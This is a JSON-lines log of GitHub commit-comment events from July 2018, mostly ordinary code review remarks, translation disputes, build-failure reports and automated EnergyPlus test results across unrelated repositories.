{"id":"7967911514","type":"CommitCommentEvent","actor":{"login":"Chromecube"},"repo":{"name":"Chromecube/Postie"},"payload":{"comment":{"id":29714207,"position":null,"line":null,"path":null,"commit_id":"55d59f1aa5ce735e0b5794e93a1efd61d68c0dd0","created_at":"2018-07-15T20:29:13Z","updated_at":"2018-07-15T20:29:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Privacy Features](https://trello.com/c/qs8EFrdW/1-privacy-features)"}},"created_at":"2018-07-15T20:29:13Z"}
{"id":"7967913140","type":"CommitCommentEvent","actor":{"login":"kaushikcfd"},"repo":{"name":"kaushikcfd/PyOP2"},"payload":{"comment":{"id":29714212,"position":8,"line":556,"path":"pyop2/codegen/rep2loopy.py","commit_id":"5c3d4ded05edcf8ce2faf2bd799a3b344647c47b","created_at":"2018-07-15T20:30:22Z","updated_at":"2018-07-15T20:30:22Z","author_association":"OWNER","body":"The reason being -- I had restricted only to triangular elements."}},"created_at":"2018-07-15T20:30:22Z"}
{"id":"7967913699","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29714213,"position":null,"line":null,"path":null,"commit_id":"0a8ef45d23c2ce809a6373e45cb403fe6d1964b7","created_at":"2018-07-15T20:30:48Z","updated_at":"2018-07-15T20:30:48Z","author_association":"CONTRIBUTOR","body":"¿Porqué vuelves a cambiar lo de raspberry a berry? Y también cambiaste de regreso la etiqueta \"tunneler\" en Traits_Singular.xml que estaba perfectamente bien.\r\n\r\nYa es mala fe de tu parte. Las comprobé en mi juego, en mi computadora y estoy 100% seguro que así estaban bien."}},"created_at":"2018-07-15T20:30:48Z"}
{"id":"7967915724","type":"CommitCommentEvent","actor":{"login":"DBOTW"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":29714216,"position":6,"line":322,"path":"Kernel/platform-trs80/devtty.c","commit_id":"35cce9e543a24a70dbd3660002e6f99aea650c65","created_at":"2018-07-15T20:32:22Z","updated_at":"2018-07-15T20:32:22Z","author_association":"NONE","body":"the above line should be: \r\n```c\r\nif (!input_match_meta(c)) {\r\n```\r\n... like to one for `trs80m1` ..."}},"created_at":"2018-07-15T20:32:22Z"}
{"id":"7967916828","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29714218,"position":null,"line":null,"path":null,"commit_id":"0a8ef45d23c2ce809a6373e45cb403fe6d1964b7","created_at":"2018-07-15T20:33:12Z","updated_at":"2018-07-15T20:33:12Z","author_association":"CONTRIBUTOR","body":"![frambueso silvestre](https://user-images.githubusercontent.com/18540487/42738143-5e79858c-8844-11e8-8361-ce8463fdce4d.jpg)\r\n"}},"created_at":"2018-07-15T20:33:12Z"}
{"id":"7967917087","type":"CommitCommentEvent","actor":{"login":"StanleySweet"},"repo":{"name":"0ADMods/terra_magna"},"payload":{"comment":{"id":29714219,"position":null,"line":null,"path":null,"commit_id":"599433ac7bfbdc3b87b776b4d8cfc0f24fc19376","created_at":"2018-07-15T20:33:25Z","updated_at":"2018-07-15T20:33:25Z","author_association":"CONTRIBUTOR","body":"Couldn't find what's wrong with the corral at first glance so I guess something is either wrong in the actor or the template.\r\n\r\nThat would be nice however I don't have the time right now. I just want to release it on mod.io and take a break."}},"created_at":"2018-07-15T20:33:25Z"}
{"id":"7967918239","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"MissingBytes/apertium-kan-mar"},"payload":{"comment":{"id":29714220,"position":26,"line":348,"path":"apertium-kan-mar.kan-mar.dix","commit_id":"3a4d85367703af609a2064556ddbd5cda078c7b1","created_at":"2018-07-15T20:34:20Z","updated_at":"2018-07-15T20:34:20Z","author_association":"COLLABORATOR","body":"This looks kind of adverbial, why is it a noun?"}},"created_at":"2018-07-15T20:34:20Z"}
{"id":"7967918633","type":"CommitCommentEvent","actor":{"login":"sniffingpickles"},"repo":{"name":"zdrouse/Auto-Amazon-Giveaways"},"payload":{"comment":{"id":29714221,"position":null,"line":null,"path":null,"commit_id":"2779c87e5602f380a7037c35438d3745c1467b04","created_at":"2018-07-15T20:34:42Z","updated_at":"2018-07-15T20:34:42Z","author_association":"NONE","body":"> Very cool!!\r\n> \r\n> Runs pretty well until several items in -- \"TypeError: Object of type 'ElementHandle' is not JSON serializable\"\r\n\r\nIt shouldn't my update fixes that error."}},"created_at":"2018-07-15T20:34:42Z"}
{"id":"7967918704","type":"CommitCommentEvent","actor":{"login":"Seraphineyoung"},"repo":{"name":"rajgthub/group_research_node_class-4"},"payload":{"comment":{"id":29714223,"position":null,"line":null,"path":null,"commit_id":"efd03cab69ef7771722044b7052be96498c5c7c7","created_at":"2018-07-15T20:34:46Z","updated_at":"2018-07-15T20:34:46Z","author_association":"COLLABORATOR","body":"Great..well done Raj for taking the initiative in this project..I would like us to keep on motivating each other  and improve. I do not mind you taking lead on the project "}},"created_at":"2018-07-15T20:34:46Z"}
{"id":"7967919541","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29714224,"position":7,"line":164,"path":"ogsr_engine/build_config_defines.h","commit_id":"80338370bb1f06491f9b70d9ab9ba611378c4ff9","created_at":"2018-07-15T20:35:25Z","updated_at":"2018-07-15T20:35:25Z","author_association":"NONE","body":"Почему-то BugTrap даёт одинаковый стек вызовов и на x64 и на x86. Ох и зря же его везде вырезают..."}},"created_at":"2018-07-15T20:35:25Z"}
{"id":"7967921182","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714229,"position":18,"line":18,"path":"group/assignment5/VertexLabel.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T20:36:42Z","updated_at":"2018-07-15T20:36:42Z","author_association":"COLLABORATOR","body":"I know this color naming convention for DFS, but maybe a more informative naming could be: Unvisited, Visiting, Visited."}},"created_at":"2018-07-15T20:36:42Z"}
{"id":"7967921414","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29714230,"position":null,"line":null,"path":null,"commit_id":"ea10cdb8156fa6deed1991a7b68d82ad0255e1e7","created_at":"2018-07-15T20:36:53Z","updated_at":"2018-07-15T20:36:53Z","author_association":"MEMBER","body":"Yep, tested on in squid.conf"}},"created_at":"2018-07-15T20:36:53Z"}
{"id":"7967921562","type":"CommitCommentEvent","actor":{"login":"rajgthub"},"repo":{"name":"rajgthub/group_research_node_class-4"},"payload":{"comment":{"id":29714231,"position":null,"line":null,"path":null,"commit_id":"efd03cab69ef7771722044b7052be96498c5c7c7","created_at":"2018-07-15T20:37:00Z","updated_at":"2018-07-15T20:37:00Z","author_association":"OWNER","body":"Thanks very much! I will keep updating.... :+1: "}},"created_at":"2018-07-15T20:37:00Z"}
{"id":"7967921799","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714232,"position":17,"line":17,"path":"group/assignment5/VertexLabel.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T20:37:11Z","updated_at":"2018-07-15T20:37:11Z","author_association":"COLLABORATOR","body":"I'd move this class into Vertex.java"}},"created_at":"2018-07-15T20:37:11Z"}
{"id":"7967924260","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29714238,"position":7,"line":164,"path":"ogsr_engine/build_config_defines.h","commit_id":"80338370bb1f06491f9b70d9ab9ba611378c4ff9","created_at":"2018-07-15T20:39:09Z","updated_at":"2018-07-15T20:39:09Z","author_association":"CONTRIBUTOR","body":"Так, хватит тут БагТрап везде пиарить. Или тебе за рекламу платят? Не нравится эта приблуда никому."}},"created_at":"2018-07-15T20:39:09Z"}
{"id":"7967924295","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29714239,"position":null,"line":null,"path":null,"commit_id":"0a8ef45d23c2ce809a6373e45cb403fe6d1964b7","created_at":"2018-07-15T20:39:11Z","updated_at":"2018-07-15T20:39:11Z","author_association":"CONTRIBUTOR","body":"![plant_raspberry](https://user-images.githubusercontent.com/18540487/42738195-3625cc98-8845-11e8-9010-bede0a6ae234.jpg)\r\n"}},"created_at":"2018-07-15T20:39:11Z"}
{"id":"7967925044","type":"CommitCommentEvent","actor":{"login":"rishabhdeepsingh"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29714242,"position":6,"line":8,"path":"OpenRobertaParent/OpenRobertaServer/staticResources/js/singleUser.js","commit_id":"2bea3101fda293bc1c6a7dace31d97c653d1ebeb","created_at":"2018-07-15T20:39:47Z","updated_at":"2018-07-15T20:39:47Z","author_association":"OWNER","body":"But it is generated by default in index.html "}},"created_at":"2018-07-15T20:39:47Z"}
{"id":"7967926620","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29714245,"position":null,"line":null,"path":null,"commit_id":"0a8ef45d23c2ce809a6373e45cb403fe6d1964b7","created_at":"2018-07-15T20:41:03Z","updated_at":"2018-07-15T20:41:03Z","author_association":"CONTRIBUTOR","body":"![tunneler](https://user-images.githubusercontent.com/18540487/42738204-7a33104e-8845-11e8-9bcb-ca83ec59870d.JPG)\r\n\r\n![Uploading Total Bets.jpg…]()\r\n"}},"created_at":"2018-07-15T20:41:03Z"}
{"id":"7967926752","type":"CommitCommentEvent","actor":{"login":"Matosinho"},"repo":{"name":"GregorySantos/POO2018.1"},"payload":{"comment":{"id":29714246,"position":null,"line":null,"path":null,"commit_id":"f379c21f1e48dc3e7b2bb9155ca37ae2c045edbc","created_at":"2018-07-15T20:41:09Z","updated_at":"2018-07-15T20:41:09Z","author_association":"COLLABORATOR","body":"AGORA VAI"}},"created_at":"2018-07-15T20:41:09Z"}
{"id":"7967927312","type":"CommitCommentEvent","actor":{"login":"vanobl"},"repo":{"name":"vanobl/homework"},"payload":{"comment":{"id":29714248,"position":null,"line":null,"path":null,"commit_id":"607e95052706067a3bd928119b2b9b480781d6ce","created_at":"2018-07-15T20:41:32Z","updated_at":"2018-07-15T20:41:32Z","author_association":"OWNER","body":"add #"}},"created_at":"2018-07-15T20:41:32Z"}
{"id":"7967928024","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29714251,"position":7,"line":164,"path":"ogsr_engine/build_config_defines.h","commit_id":"80338370bb1f06491f9b70d9ab9ba611378c4ff9","created_at":"2018-07-15T20:42:05Z","updated_at":"2018-07-15T20:42:05Z","author_association":"NONE","body":"Шо ругаешься? :D Да и кто будет платить за рекламу бесплатной библиотеки...\r\nИ, к тому же, ничего, что это библиотека даёт более расширенную и полезную информацию о системе пользователя? Это очень полезно в специфических ситуациях."}},"created_at":"2018-07-15T20:42:05Z"}
{"id":"7967928777","type":"CommitCommentEvent","actor":{"login":"Theosakamg"},"repo":{"name":"Organicdareal/imibot"},"payload":{"comment":{"id":29714252,"position":10,"line":107,"path":"imibot_driver/CMakeLists.txt","commit_id":"77307729b433da2fbd3f51c90be0a27f32ebee21","created_at":"2018-07-15T20:42:40Z","updated_at":"2018-07-15T20:42:40Z","author_association":"COLLABORATOR","body":"Why duplicate this ?"}},"created_at":"2018-07-15T20:42:40Z"}
{"id":"7967929261","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714253,"position":10,"line":10,"path":"group/assignment5/UnknownAlphabet.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T20:42:54Z","updated_at":"2018-07-15T20:42:54Z","author_association":"COLLABORATOR","body":"Would \"AlphabetDiscoverer\" be a better name?\r\nThis class actually supposed to make the alphabet known."}},"created_at":"2018-07-15T20:42:54Z"}
{"id":"7967929701","type":"CommitCommentEvent","actor":{"login":"tomschenkjr"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29714254,"position":142,"line":306,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-15T20:43:14Z","updated_at":"2018-07-15T20:43:14Z","author_association":"MEMBER","body":"Ok, thanks. I'm doing some grammar edits and will just be a bit more literal for the calculations."}},"created_at":"2018-07-15T20:43:14Z"}
{"id":"7967930273","type":"CommitCommentEvent","actor":{"login":"tomschenkjr"},"repo":{"name":"Chicago/predicting-e-coli-concentrations"},"payload":{"comment":{"id":29714256,"position":188,"line":533,"path":"predicting-e-coli-concentrations.Rmd","commit_id":"05c6ba2a059a226bbeeb34f0147f813a42ba36eb","created_at":"2018-07-15T20:43:43Z","updated_at":"2018-07-15T20:43:43Z","author_association":"MEMBER","body":"Yes, please do update the calculation for this one."}},"created_at":"2018-07-15T20:43:43Z"}
{"id":"7967931579","type":"CommitCommentEvent","actor":{"login":"devakira"},"repo":{"name":"devakira/twitchbot"},"payload":{"comment":{"id":29714259,"position":null,"line":null,"path":null,"commit_id":"5d1af8047cffc8510cb15e8dfdb36a94938d14fe","created_at":"2018-07-15T20:44:49Z","updated_at":"2018-07-15T20:44:49Z","author_association":"OWNER","body":"this ad was brought to you by gay peoples' association"}},"created_at":"2018-07-15T20:44:49Z"}
{"id":"7967931824","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29714261,"position":191,"line":191,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-15T20:45:02Z","updated_at":"2018-07-15T20:45:02Z","author_association":"CONTRIBUTOR","body":"I'm kind of wondering if this conjoins two sets of state that need not be conjoined.  ST_IDLE and ST_COMPARING seems like two closely linked things that do not need states in a state machine, whereas the state machine really applies mostly to the lookup engine.  State machines are a good metaphor for walking through a sequence (for instance, \"idle, looking up A, looking up B\", but much of the time, you can be clearer by just having a bunch of wires to describe what a related chunk of logic is doing.  For instance, if the TLB-and-RAM part of the engine is one chunk of logic, there might be control wires from the refill logic, \"refill is busy\" and \"refill wants write to TLB\".  Then, rather than explicit states, the logic \"synchronizes itself\".  In some regards, it's a little bit messier to do it that way -- there are more moving parts.  In other regards, it's cleaner -- any time you see a state like \"delay state\", then that's an indication that there's an opportunity for the implementation of a datapath to get out of sync with a sequencer..."}},"created_at":"2018-07-15T20:45:02Z"}
{"id":"7967931929","type":"CommitCommentEvent","actor":{"login":"vanobl"},"repo":{"name":"vanobl/homework"},"payload":{"comment":{"id":29714262,"position":null,"line":null,"path":null,"commit_id":"607e95052706067a3bd928119b2b9b480781d6ce","created_at":"2018-07-15T20:45:09Z","updated_at":"2018-07-15T20:45:09Z","author_association":"OWNER","body":"gggg"}},"created_at":"2018-07-15T20:45:09Z"}
{"id":"7967932359","type":"CommitCommentEvent","actor":{"login":"filteraction"},"repo":{"name":"filteraction/user-panel-lite"},"payload":{"comment":{"id":29714265,"position":null,"line":null,"path":null,"commit_id":"5f363d749f9a54344744051d257b8a4f791db68e","created_at":"2018-07-15T20:45:27Z","updated_at":"2018-07-15T20:45:27Z","author_association":"OWNER","body":"updated"}},"created_at":"2018-07-15T20:45:27Z"}
{"id":"7967932962","type":"CommitCommentEvent","actor":{"login":"vemv"},"repo":{"name":"weavejester/cljfmt"},"payload":{"comment":{"id":29714266,"position":null,"line":null,"path":null,"commit_id":"439a2503e2d7e94ea57b7bb43a1ac4664d45d7b7","created_at":"2018-07-15T20:45:52Z","updated_at":"2018-07-15T20:45:52Z","author_association":"CONTRIBUTOR","body":"Hey there James, I'm happy to see some recent improvements.\r\n\r\nIs a new release coming soon?\r\n\r\nThanks - Victor"}},"created_at":"2018-07-15T20:45:52Z"}
{"id":"7967934757","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714268,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-15T20:46:54Z","updated_at":"2018-07-15T20:46:54Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2319 of 2319 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T20:46:54Z"}
{"id":"7967935229","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714269,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-15T20:47:12Z","updated_at":"2018-07-15T20:47:12Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (3356 of 3356 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T20:47:12Z"}
{"id":"7967935764","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29714270,"position":7,"line":164,"path":"ogsr_engine/build_config_defines.h","commit_id":"80338370bb1f06491f9b70d9ab9ba611378c4ff9","created_at":"2018-07-15T20:47:38Z","updated_at":"2018-07-15T20:47:38Z","author_association":"NONE","body":"Впрочем, по теме стека вызовов – вот [этот](https://github.com/OpenXRay/xray-16/pull/194) код с использованием DbgHlp работает одинаково на x64 и x86 и без BugTrap, за что спасибо @NeoAnomaly =)"}},"created_at":"2018-07-15T20:47:38Z"}
{"id":"7967936516","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714274,"position":59,"line":59,"path":"group/assignment5/UnknownAlphabet.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T20:48:14Z","updated_at":"2018-07-15T20:48:14Z","author_association":"COLLABORATOR","body":"I think that topological sort and DFS should be generic, and part of the Graph class."}},"created_at":"2018-07-15T20:48:14Z"}
{"id":"7967936805","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29714275,"position":73,"line":73,"path":"group/assignment5/UnknownAlphabet.java","commit_id":"4bfaace1621b86ad9416d28f7b43ebe0baa1df4f","created_at":"2018-07-15T20:48:28Z","updated_at":"2018-07-15T20:48:28Z","author_association":"COLLABORATOR","body":"As said, I think that topological sort and DFS should be generic, and part of the Graph class."}},"created_at":"2018-07-15T20:48:28Z"}
{"id":"7967937616","type":"CommitCommentEvent","actor":{"login":"shs96c"},"repo":{"name":"manoj9788/docs"},"payload":{"comment":{"id":29714276,"position":9,"line":15,"path":"side.html","commit_id":"9c984ccbf45d9c151d463959bf41092c4dea2e22","created_at":"2018-07-15T20:49:05Z","updated_at":"2018-07-15T20:49:05Z","author_association":"NONE","body":"How about \"Selenium IDE (Integrated Development Environment) is an easy-to-use record/playback tool designed to allow anyone to quickly record tests that use Selenium. It's a Web Extension, which means it will work in browsers such as Chrome, Firefox, and any other browser that supports the standard. It records...\"?"}},"created_at":"2018-07-15T20:49:05Z"}
{"id":"7967937921","type":"CommitCommentEvent","actor":{"login":"femi1207"},"repo":{"name":"femi1207/my-portfolio"},"payload":{"comment":{"id":29714277,"position":null,"line":null,"path":null,"commit_id":"71a3c409421c8f9af33181c7a6637b23269a798b","created_at":"2018-07-15T20:49:20Z","updated_at":"2018-07-15T20:49:20Z","author_association":"OWNER","body":"https://femi1207.github.io/my-portfolio/"}},"created_at":"2018-07-15T20:49:20Z"}
{"id":"7967938406","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29714278,"position":227,"line":227,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-15T20:49:43Z","updated_at":"2018-07-15T20:49:43Z","author_association":"CONTRIBUTOR","body":"Be careful with using 'ready' signals like this (or, conversely, with making 'ready' signals generated in a complicated fashion, as this block does) -- it can stack fairly complicated logic back to back.  One school of thought is that 'ready' signals maybe should only be connected with small amounts of combinational logic to the CE pins on flops..."}},"created_at":"2018-07-15T20:49:43Z"}
{"id":"7967939497","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29714279,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T20:50:36Z","updated_at":"2018-07-15T20:50:36Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2373 of 2935 tests passed, 61 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 558 tests had: Table big diffs.\n * 76 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 168 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 101 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 18 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 61\n * Failed: 562\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.85%25-red.png)</a> \n"}},"created_at":"2018-07-15T20:50:36Z"}
{"id":"7967939884","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29714280,"position":271,"line":271,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-15T20:50:53Z","updated_at":"2018-07-15T20:50:53Z","author_association":"CONTRIBUTOR","body":"Maybe better to one-hot encode these.  It turns out that 0, 1, and 2 *are* one-hot encoded, in the end ... but I think traditionally one would just call these evict_update_a_from_hit, evict_update_a_from_miss, ..."}},"created_at":"2018-07-15T20:50:53Z"}
{"id":"7967944184","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29714284,"position":330,"line":330,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-15T20:54:21Z","updated_at":"2018-07-15T20:54:21Z","author_association":"CONTRIBUTOR","body":"I think this synthesizes to an AND gate but I don't understand what exactly is going on here.  It generates a *lot* of wires!  What's the plan here?  I think this is just a one-hot decoder?"}},"created_at":"2018-07-15T20:54:21Z"}
{"id":"7967944718","type":"CommitCommentEvent","actor":{"login":"layus"},"repo":{"name":"openlab-aux/vuizvui"},"payload":{"comment":{"id":29714285,"position":null,"line":null,"path":null,"commit_id":"8e5d3291b2aa3901c6dc77a982450667d930dc86","created_at":"2018-07-15T20:54:47Z","updated_at":"2018-07-15T20:54:47Z","author_association":"CONTRIBUTOR","body":"Nice ! I will try to build and run it shortly."}},"created_at":"2018-07-15T20:54:47Z"}
{"id":"7967944850","type":"CommitCommentEvent","actor":{"login":"layus"},"repo":{"name":"openlab-aux/vuizvui"},"payload":{"comment":{"id":29714286,"position":145,"line":91,"path":"pkgs/games/humblebundle/bastion.nix","commit_id":"8e5d3291b2aa3901c6dc77a982450667d930dc86","created_at":"2018-07-15T20:54:53Z","updated_at":"2018-07-15T20:54:53Z","author_association":"CONTRIBUTOR","body":"You are crazy ;-)"}},"created_at":"2018-07-15T20:54:53Z"}
{"id":"7967946577","type":"CommitCommentEvent","actor":{"login":"agobeaux"},"repo":{"name":"OpenWeek/ictv-plugin-github"},"payload":{"comment":{"id":29714288,"position":null,"line":null,"path":null,"commit_id":"0152fd5d4d7c0ae317cf9ca57f627193465994ea","created_at":"2018-07-15T20:56:13Z","updated_at":"2018-07-15T20:56:13Z","author_association":"CONTRIBUTOR","body":"I see you have deleted the line 184 which was there for bug purposes (I see I didn't leave a comment, that's strange). Have you fixed the bug ? Then how ?"}},"created_at":"2018-07-15T20:56:13Z"}
{"id":"7967950656","type":"CommitCommentEvent","actor":{"login":"jerrynsr"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29714293,"position":null,"line":null,"path":null,"commit_id":"a4e16dbb046d89f9146dbc9408f2bfb96ec73a82","created_at":"2018-07-15T20:59:22Z","updated_at":"2018-07-15T20:59:22Z","author_association":"NONE","body":"There is an issue building Jack on High Sierra 10.13.6 because Apple decided to remove the vDSP API. \r\nWithout it the build fails.  There's some work to be done \r\n#error \"The vecLib framework is deprecated. Please include <Accelerate/Accelerate.h> instead of <vecLib/vecLib.h> and link to the Accelerate framework instead of the vecLib framework.\"\r\n ^\r\n../common/JackAudioPort.cpp:46:5: error: use of undeclared identifier 'vDSP_vadd'\r\n    vDSP_vadd(buffer, 1, mixbuffer, 1, mixbuffer, 1, frames);\r\n\r\nI guess I should have stayed with El Capitan for at least 6 more months.\r\n\r\nPlease let me know when MacPorts is ready for High Sierra.\r\n\r\nThanks."}},"created_at":"2018-07-15T20:59:22Z"}
{"id":"7967954550","type":"CommitCommentEvent","actor":{"login":"gurkangokdemir"},"repo":{"name":"regainingark/test-swift"},"payload":{"comment":{"id":29714306,"position":null,"line":null,"path":null,"commit_id":"071e470ff0b8959b454e376408a267b4d1a3563e","created_at":"2018-07-15T21:02:04Z","updated_at":"2018-07-15T21:02:04Z","author_association":"COLLABORATOR","body":"Thats ok."}},"created_at":"2018-07-15T21:02:04Z"}
{"id":"7967955733","type":"CommitCommentEvent","actor":{"login":"billbrod"},"repo":{"name":"ScAAN/waterfrontmap"},"payload":{"comment":{"id":29714310,"position":null,"line":null,"path":null,"commit_id":"82519df1aae4b61b95b6cc065875436430879660","created_at":"2018-07-15T21:03:07Z","updated_at":"2018-07-15T21:03:07Z","author_association":"CONTRIBUTOR","body":"The update here is to change the zoom levels we optimized for to the ones that we currently allow for the map (10 to 13)."}},"created_at":"2018-07-15T21:03:07Z"}
{"id":"7967959473","type":"CommitCommentEvent","actor":{"login":"Favna"},"repo":{"name":"iAroc/iAroc.github.io"},"payload":{"comment":{"id":29714320,"position":null,"line":null,"path":null,"commit_id":"ab50dd14e3bd5af2d4e5e78b442fc733d43900b1","created_at":"2018-07-15T21:05:56Z","updated_at":"2018-07-15T21:05:56Z","author_association":"CONTRIBUTOR","body":"You're writing some wrong data here because I noticed that between runs my Link character has increased in level by 1 twice now. \n\n[here is a lower level link (203 iirc)](https://favna.s-ul.eu/d3yTQ78D.bin)\n\n[and here is a higher level Link (204 iirc)](https://favna.s-ul.eu/Mwr3sANf.bin)"}},"created_at":"2018-07-15T21:05:56Z"}
{"id":"7967961146","type":"CommitCommentEvent","actor":{"login":"omega2amm"},"repo":{"name":"omega2amm/test1"},"payload":{"comment":{"id":29714321,"position":null,"line":null,"path":null,"commit_id":"32e841f6b0efd8117de8b890268e5999db083c57","created_at":"2018-07-15T21:07:08Z","updated_at":"2018-07-15T21:07:08Z","author_association":"OWNER","body":"what is that ?"}},"created_at":"2018-07-15T21:07:08Z"}
{"id":"7967964298","type":"CommitCommentEvent","actor":{"login":"puresky07"},"repo":{"name":"puresky07/selfStats"},"payload":{"comment":{"id":29714326,"position":null,"line":null,"path":null,"commit_id":"0c80ef9f3ef7b4541240a8b8fbc657022c8f29cf","created_at":"2018-07-15T21:09:38Z","updated_at":"2018-07-15T21:09:38Z","author_association":"OWNER","body":"Super, merci :+1: "}},"created_at":"2018-07-15T21:09:38Z"}
